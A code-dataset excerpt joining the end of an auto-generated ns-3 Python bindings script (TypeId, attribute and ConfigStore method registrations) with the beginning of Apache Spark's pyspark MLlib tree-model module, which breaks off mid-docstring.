## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info')],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3ConfigStore_methods(root_module, cls):
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
cls.add_constructor([])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
cls.add_method('SetFileFormat',
'void',
[param('ns3::ConfigStore::FileFormat', 'format')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::ConfigStore::Mode', 'mode')])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
| gpl-2.0 |
rikima/spark | python/pyspark/mllib/tree.py | 24 | 24125 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import sys
import random
from pyspark import SparkContext, RDD, since
from pyspark.mllib.common import callMLlibFunc, inherit_doc, JavaModelWrapper
from pyspark.mllib.linalg import _convert_to_vector
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.util import JavaLoader, JavaSaveable
__all__ = ['DecisionTreeModel', 'DecisionTree', 'RandomForestModel',
'RandomForest', 'GradientBoostedTreesModel', 'GradientBoostedTrees']
class TreeEnsembleModel(JavaModelWrapper, JavaSaveable):
"""TreeEnsembleModel
.. versionadded:: 1.3.0
"""
@since("1.3.0")
def predict(self, x):
"""
Predict values for a single data point or an RDD of points using
the model trained.
.. note:: In Python, predict cannot currently be used within an RDD
transformation or action.
Call predict directly on the RDD instead.
"""
if isinstance(x, RDD):
return self.call("predict", x.map(_convert_to_vector))
else:
return self.call("predict", _convert_to_vector(x))
@since("1.3.0")
def numTrees(self):
"""
Get number of trees in ensemble.
"""
return self.call("numTrees")
@since("1.3.0")
def totalNumNodes(self):
"""
Get total number of nodes, summed over all trees in the ensemble.
"""
return self.call("totalNumNodes")
def __repr__(self):
""" Summary of model """
return self._java_model.toString()
@since("1.3.0")
def toDebugString(self):
""" Full model """
return self._java_model.toDebugString()
class DecisionTreeModel(JavaModelWrapper, JavaSaveable, JavaLoader):
"""
A decision tree model for classification or regression.
.. versionadded:: 1.1.0
"""
@since("1.1.0")
def predict(self, x):
"""
Predict the label of one or more examples.
